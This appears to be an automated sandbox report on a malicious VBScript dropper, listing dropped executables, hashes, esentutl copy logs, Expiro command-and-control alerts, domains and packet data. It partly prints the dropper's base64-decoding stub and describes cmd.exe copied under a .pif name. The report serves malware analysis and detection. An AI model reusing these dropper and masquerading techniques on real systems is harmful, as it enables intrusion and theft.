                                                                                                                                                                                                                                                                                                                              Preview:...Y#..K..... .$..!.!'&..&.......%..... ........ %.....Y#..KU"..!.&..&&...Y#..K^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyr.Rh-kca.e_p.f.law9wkv`.bvms.k\{{._g<Qp).9j8....l+.5a..Gw..5^..@.3\^T....7ct[.h.....yr...d..Y.7^r..4.v.\*

Process:C:\Windows\SysWOW64\esentutl.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1226752
Entropy (8bit):7.458699684550258
Encrypted:false
SSDEEP:24576:KdKnJlmwhG7vohKM4br2gza6HR2zlPQxL/F99UljJes8lSnQ:KCl70YOLSes8lSQ
MD5:53F0663219E6091CECD600C59389711F
SHA1:F1986A61C2CB0107444FBD3E8075A25E21FB26CA
SHA-256:0161D30DEFEE14B9BDAC49068C63A344320C11330ACDFC10952C025637684ADB
SHA-512:9D466680CC90F57ADA29495E32592084EC6DAF37CDC53F2776A720D66F0284B09C619A25C9EDE8E73E91B8C20D2A7AB5DFEE0504BA7454389CE842AFD27962A1
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\x.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):5
Entropy (8bit):1.9219280948873623
Encrypted:false
SSDEEP:3:MVy:Ms
MD5:B8A4F2F99C387B80CDA72F6B43079B8B
SHA1:A2281BBFE78D4F0D6FC03B4799FFD5D010997B13
SHA-256:90B53DF56816C127246136D4403ABA3B26CEC599B2B950FB2BA78D6C1FB4E6BF
SHA-512:413F0252867E18DD1F009F10018578790F9BFBE252B27FCC6452CB8B03E46CCAA251A9FF15CD962A45EA03469BBC7B1867A38A6F37EABEDAC29184AF5860501A
Malicious:false
Reputation:unknown
Preview:100..

Process:C:\Users\user\AppData\Local\Temp\x.exe
File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
Category:dropped
Size (bytes):62357
Entropy (8bit):4.705712327109906
Encrypted:false
SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
MD5:B87F096CBC25570329E2BB59FEE57580
SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\x.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):68096
Entropy (8bit):6.328046551801531
Encrypted:false
SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
MD5:C116D3604CEAFE7057D77FF27552C215
SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Reputation:unknown

Process:C:\Windows\SysWOW64\esentutl.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):236544
Entropy (8bit):6.4416694948877025
Encrypted:false
SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):410
Entropy (8bit):5.361827289088002
Encrypted:false
SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:64A2247B3C640AB3571D192DF2079FCF
SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:false
Reputation:unknown
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):15612
Entropy (8bit):5.0007665989277985
Encrypted:false
SSDEEP:384:d1VoGIpN6KQkj2qkjh4iUxehQVKoxOdBMNXp5rvOjJiYo0ib4J:d1V3IpNBQkj2Ph4iUxehYKoxOdBMNZd4
MD5:A8D66A40EEA8831B03CDC478ED797E6E
SHA1:F2DB655B7A8F6A211E8F6D95B50B3D7BC325F7CE
SHA-256:09178396408F3B27CBE725A8A455B37894EE4A3DBFCC34636DD23E96AB97C8CA
SHA-512:33C1DA734E45158C61EA1679202BAA3813C71901C9B5D481A09F244C9653C4DD76C1CD12378468579595C3C8CC92F60E868982BB26236841CDAE7BDB5B455C8F
Malicious:false
Reputation:unknown
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):2220
Entropy (8bit):5.380322200793485
Encrypted:false
SSDEEP:48:wYWSU4xympjgZ9tz4RIoUl8NPryHl7u1iMugeC/ZM0Uyu+d:FLHxvCZfIfSKjyFOugw1K
MD5:6978BD535342648D7294BE8C3D34E78F
SHA1:FE7A2C951FE0242FFD2F1819B0F2BF03E243F4AD
SHA-256:3312EAD9D5560AFF09A61E18ED339B2EE6D642A9007815AD2C6202505BA9C902
SHA-512:AB743BE5BA3BBDCDA77F48A7201D988E14003322538E612BB6C2F1159E621DF58B389E235EEAB17A9A7F20FB1E1E533158768A05A79F7E735668295C7F8F8E54
Malicious:false
Reputation:unknown
Process:C:\Users\Public\Libraries\aymtmquJ.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1425408
Entropy (8bit):5.680690579464684
Encrypted:false
SSDEEP:24576:Zk70Trcosu4CTPpR9+aHsqjnhMgeiCl7G0nehbGZpbD:ZkQTAW5v+ADmg27RnWGj
MD5:9ECE2AAE8E8FA77849268DDA20CAEC7B
SHA1:51A2DCBBA6BCBB069A3A5AB77659D46E98B02289
SHA-256:A7BA9EAC2A255CAB335D7B0D00DA00C962E2BECC8AEBF313434E861C502D5DD9
SHA-512:E3CB79FB953D247C98B06E64EFE737D53EB57233B43B4FD2A637EBD0F5C9FF088ADCAF4CFFC095AA6A6CE7B87F4B9812D1D8B76A0D27BBBBB4955FA57260ADB7
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Users\Public\Libraries\aymtmquJ.pif
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):70656
Entropy (8bit):4.910353963160109
Encrypted:false
SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
MD5:E91A1DB64F5262A633465A0AAFF7A0B0
SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\wscript.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1226752
Entropy (8bit):7.458699684550258
Encrypted:false
SSDEEP:24576:KdKnJlmwhG7vohKM4br2gza6HR2zlPQxL/F99UljJes8lSnQ:KCl70YOLSes8lSQ
MD5:53F0663219E6091CECD600C59389711F
SHA1:F1986A61C2CB0107444FBD3E8075A25E21FB26CA
SHA-256:0161D30DEFEE14B9BDAC49068C63A344320C11330ACDFC10952C025637684ADB
SHA-512:9D466680CC90F57ADA29495E32592084EC6DAF37CDC53F2776A720D66F0284B09C619A25C9EDE8E73E91B8C20D2A7AB5DFEE0504BA7454389CE842AFD27962A1
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................T.............@..........................P...................@...............................%...........................0...g........................... .......................................................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...........z...................idata...%.......&...z..............@....tls....4................................rdata....... ......................@..@.reloc...g...0...h..................@..B.rsrc...............................@..@.............P......................@..@................................................................................................
Process:C:\Users\Public\Libraries\aymtmquJ.pif
File Type:data
Category:dropped
Size (bytes):12320
Entropy (8bit):7.98571180913496
Encrypted:false
SSDEEP:384:otoqM/TlnhCgs7a2GSwDRZwGwRpGWKtSisdMXrlK:2oTLg7aJPD/w5rGWKQdb
MD5:8CE4D0C966626CD29B02600DB610932A
SHA1:CB205323FC395C46C07F87CEB6A91B01248A465C
SHA-256:E79B750C3A616521F47DD0A7FB9241F124D574E40F39A1773873C370E4E4433E
SHA-512:ACC1D65F57B36B403E526F88FCFD2D135C4E482209179C1A60E68F1B2D1663CF2CB094DE76CEDAD03E1D66ACC0E3960473F9CEF03923FF2ECA89C27B9E32601D
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:#P......Wz....,..M.V..(|b{.e..\.|..n..2..bv0....y......+...Gj........A.3sVx%...f.........B.......'..._..U..A.Z+S.......*...n.g{.aY..c...fm!..~1......c..*3...PP.S....hqJ...C..0......!.#M.D...V[z_..f.e+..."..h.?.l...=\..efS....k<.....q}T>K..f....6.{...........?.^^.D.2C9VL...eG.l...u.....a..<......M6}~..6z.c..).....<........q....Tq..c...#L:8..'.*2"@27.F....dZ....-..G#c ..a!...^"..4Y.ZzU...H<5..q}-..].....qj..6@S&...].@...].V$K.c. ..6.....S'.MQx....6!....8..oC..........$...B..........m......g &..4....?}..}....._w........../L[%...k..;....Zr(a.h.k.....r.m......I4 ...F......./.s..e%...LzS.1.Q......$y.r2.....V<..h.t..K.&.....0...DVL.A>.J...@...bL_..V.wI..y'..C&..#.R`.0...R.5.o].8.@.5.~..@....d(....p.>.?.A.j.)....'F........"....Q.Ia......"..........e.}.V.....T.....K...?.iR...P.......!./.d.....mS-..5........w*}Rj)."A..r....F..........Y....0K..u...$..ae.%I....+..D?Mf......P+..4.u.6V.m....L..cd...[..|\KQ|...G..9d.(........_f....G<..h./
Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):665670656
Entropy (8bit):7.9999992846982435
Encrypted:true
SSDEEP:
MD5:1EFEA57D13329E8280EA1889052BFB56
                                                                                                                                                                                                                                                                                                                              SHA1:732A4B642995B63E186D401381CC03D309E7FC51
                                                                                                                                                                                                                                                                                                                              SHA-256:82DB2E4BB807C5FAD567D473C3C28BB27072846161DF0276A1927CDB6EE90D4E
                                                                                                                                                                                                                                                                                                                              SHA-512:291E3301220F33359CD119B0D615ADDC96861EC8BAA000A0261A144F3FC80FB2EC76292E29CB7678FB332091893BEE12A1C39408B4A27206EFAD0180C31A4C81
                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Wed Nov 20 08:24:43 2024, mtime=Wed Nov 20 08:24:43 2024, atime=Wed Nov 20 08:24:43 2024, length=70656, window=
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):1778
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.4721021971326214
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:24:8d5mvfIo8ZZ3W4ZBN4WeQAAMoFG9KmR+O4ZvPqRepRm:8d5cymIs5A1cR+ZXqR8
                                                                                                                                                                                                                                                                                                                              MD5:3C095F27D5FBB56476C7464D04E04746
                                                                                                                                                                                                                                                                                                                              SHA1:7719DD95F35C482C2DA720BF1F727F13D77C27AE
                                                                                                                                                                                                                                                                                                                              SHA-256:4AE9DB9C182BFC48009E3C163B8BF883B610D0AA0027F8739E9E5C3589266B2C
                                                                                                                                                                                                                                                                                                                              SHA-512:DDB091D1F8196E8B92807FC54DDD2A5AC4223C2D85E7D01F9B762C7D41A63D4FE268134BB0AA129C7C27D78A8F9C15524D7AAE2B2EF21C84787B2C3703D6BF50
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):593
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.638187678646862
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:12:qx/xTzmBzeSbZ7u0wxDDDDDDDDjCaY5Da3laYAV/TB8NGNe:+/xTzkzp7u0wQakDa1aT/t8NR
                                                                                                                                                                                                                                                                                                                              MD5:3BB4FC6DF3D437752B0DAC76E39AF076
                                                                                                                                                                                                                                                                                                                              SHA1:B0CF2C9A11297C3E8FCB3D7689FBD79F6B8A9EF4
                                                                                                                                                                                                                                                                                                                              SHA-256:10308A3ED7C65D984B74793E1418E5E566459640FFAC3598495BAE254E5599DE
                                                                                                                                                                                                                                                                                                                              SHA-512:78599BBDF51376702908F3A730AF5E7E9BA439AB3CD8D60BA62D62F659413EF8E4A99AB6C1C2508CF984BE053C58DFC1CFD81FFDE0A9099718D66C4FAB903427
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
Preview:
Initiating COPY FILE mode...
Source File: C:\Users\user\AppData\Local\Temp\x.exe
Destination File: C:\\Users\\Public\\Libraries\\Juqmtmya.PIF
Copy Progress (% complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
..................................................
Total bytes read = 0x12b800 (1226752) (1 MB)
Total bytes written = 0x12c000 (1228800) (1 MB)
Operation completed successfully in 0.109 seconds.
                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):564
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.559213258257705
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:12:q6pLExT6ceSbZ7u0wxDDDDDDDDjCaY5n4aYAWS4TB8NGNBG:/pLExT6cp7u0wQakn4al4t8Nd
                                                                                                                                                                                                                                                                                                                              MD5:0EC1978C7DEABF43A4FC760EC68F2A60
                                                                                                                                                                                                                                                                                                                              SHA1:887D9B6EE210AFAF91496A6F2F2C99B255B8DDE2
                                                                                                                                                                                                                                                                                                                              SHA-256:031E9AA615CABA557C9DAC4EB8280AD0535CE9817B9C65BFFBADB77DCEBAD51B
                                                                                                                                                                                                                                                                                                                              SHA-512:31A919374C8E4A6C1C126C7C9630D49EA2CC5715627746857CADFD79918DE9865036B44A758DA83C1F703299804108B828246780B595296A8C132FB1A6EB7557
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
Preview:
Initiating COPY FILE mode...
Source File: C:\\Windows\\System32\\cmd.exe
Destination File: C:\\Users\\Public\\alpha.pif
Copy Progress (% complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
..................................................
Total bytes read = 0x39c00 (236544) (0 MB)
Total bytes written = 0x3a000 (237568) (0 MB)
Operation completed successfully in 0.62 seconds.
                                                                                                                                                                                                                                                                                                                              File type:ASCII text, with very long lines (65413), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.875877429476062
                                                                                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                                                                                                File name:IBKB.vbs
                                                                                                                                                                                                                                                                                                                                File size:1'636'027 bytes
                                                                                                                                                                                                                                                                                                                                MD5:7bbca6f64625872be1a4dba80d36fce1
                                                                                                                                                                                                                                                                                                                                SHA1:a689a21b1b8a556b7e77be10f2e7ddc0dff7d360
                                                                                                                                                                                                                                                                                                                                SHA256:d61aad06edbdd7500c507a9df016cfbdc6a21731bd707c51d97abebf687c76b6
                                                                                                                                                                                                                                                                                                                                SHA512:faf0cbcfa48c56ac77cd4f7b7e7dcc1c2c42908eb430493d36444e1c0de6b8f77326a051f34d34370e7f0134a079424e7e5e86d6a1451b03f5a598a77433f5d1
                                                                                                                                                                                                                                                                                                                                SSDEEP:24576:EIvgQAdJSSNSo4oRUTvt13g+qA+aj1tHKUJS2t9HqG7ZaSJyhh4B:vgQUNSo4oebUHYRdzSCrYc
                                                                                                                                                                                                                                                                                                                                TLSH:A7759EB85366AF613BDA47C40D48AEC54E240147903E521D6D29B1330B4AABEFB9DC7F
                                                                                                                                                                                                                                                                                                                                File Content Preview:Option Explicit..dim D,E,b,p..Set D=CreateObject("Microsoft.XMLDOM")..Set E=D.createElement("t")..E.DataType="bin.base64"..E.Text="TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0g
                                                                                                                                                                                                                                                                                                                                Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-20T10:24:34.113260+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49705 | 198.252.105.91 | 443 | TCP
2024-11-20T10:24:48.189753+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.5 | 49707 | 54.244.188.177 | 80 | TCP
2024-11-20T10:24:48.209894+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.5 | 49707 | TCP
2024-11-20T10:24:48.209894+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.5 | 49707 | TCP
2024-11-20T10:24:50.252791+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.5 | 49708 | TCP
2024-11-20T10:24:50.252791+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.141.10.107 | 80 | 192.168.2.5 | 49708 | TCP
2024-11-20T10:24:53.747785+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.5 | 51298 | 1.1.1.1 | 53 | UDP
2024-11-20T10:24:54.647482+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.5 | 49731 | TCP
2024-11-20T10:24:54.647482+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.5 | 49731 | TCP
2024-11-20T10:24:57.177822+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.5 | 52499 | 1.1.1.1 | 53 | UDP
2024-11-20T10:25:15.402425+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.5 | 50747 | 1.1.1.1 | 53 | UDP
2024-11-20T10:25:17.134094+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.5 | 63540 | 1.1.1.1 | 53 | UDP
2024-11-20T10:25:26.514301+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.5 | 51156 | 1.1.1.1 | 53 | UDP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:25:27.879440+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.5609281.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:02.433224+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.55000582.112.184.19780TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:26.064766+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.550011TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:26.064766+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.550011TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:32.924764+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.246.200.16080192.168.2.550017TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:32.924764+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.246.200.16080192.168.2.550017TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:33.604162+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.550018TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:33.604162+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.550018TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:36.015830+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.550020TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:36.015830+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.550020TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:38.794559+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.550023TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:38.794559+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.550023TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:43.938547+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.211.97.4580192.168.2.550029TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:43.938547+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.211.97.4580192.168.2.550029TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:27:00.479581+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.550043TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:27:00.479581+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.550043TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:27:01.876394+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.550044TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:27:01.876394+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.550044TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.606673956 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.606698036 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.606718063 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.609530926 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.609555960 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.609606028 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.609621048 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.609658957 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.609658957 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.613291979 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.613317966 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.613380909 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.613399029 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.613446951 CET49705443192.168.2.5198.252.105.91
